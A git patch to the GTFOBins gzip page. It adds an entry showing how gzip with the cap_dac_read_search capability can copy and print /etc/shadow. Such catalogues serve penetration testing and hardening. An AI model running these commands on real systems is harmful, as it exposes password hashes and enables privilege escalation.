From af399752015c13bb385e8bad1bf4f3a7b8e5e426 Mon Sep 17 00:00:00 2001 From: Sofia Engvall Date: Wed, 6 Nov 2024 01:37:13 +0100 Subject: [PATCH] Update gzip.md Adding capabilities for cap_dac_read_search --- _gtfobins/gzip.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/_gtfobins/gzip.md b/_gtfobins/gzip.md index 22ac50e..8b2bc2c 100644 --- a/_gtfobins/gzip.md +++ b/_gtfobins/gzip.md @@ -16,4 +16,11 @@ functions: - code: | LFILE=file_to_read sudo gzip -f $LFILE -t + capabilities: + - description: If cap_dac_read_search is set. Run ``getcap -r / 2>/dev/null`` to confirm ``/usr/bin/gzip cap_dac_read_search=ep`` + code: | + gzip can read any file: + gzip -c /etc/shadow > /tmp/shadow.gz + gzip -d /tmp/shadow.gz + cat /tmp/shadow ---